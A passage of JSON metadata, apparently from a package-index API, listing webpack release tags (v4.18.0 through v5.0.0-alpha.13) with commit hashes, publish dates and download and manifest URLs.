ebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.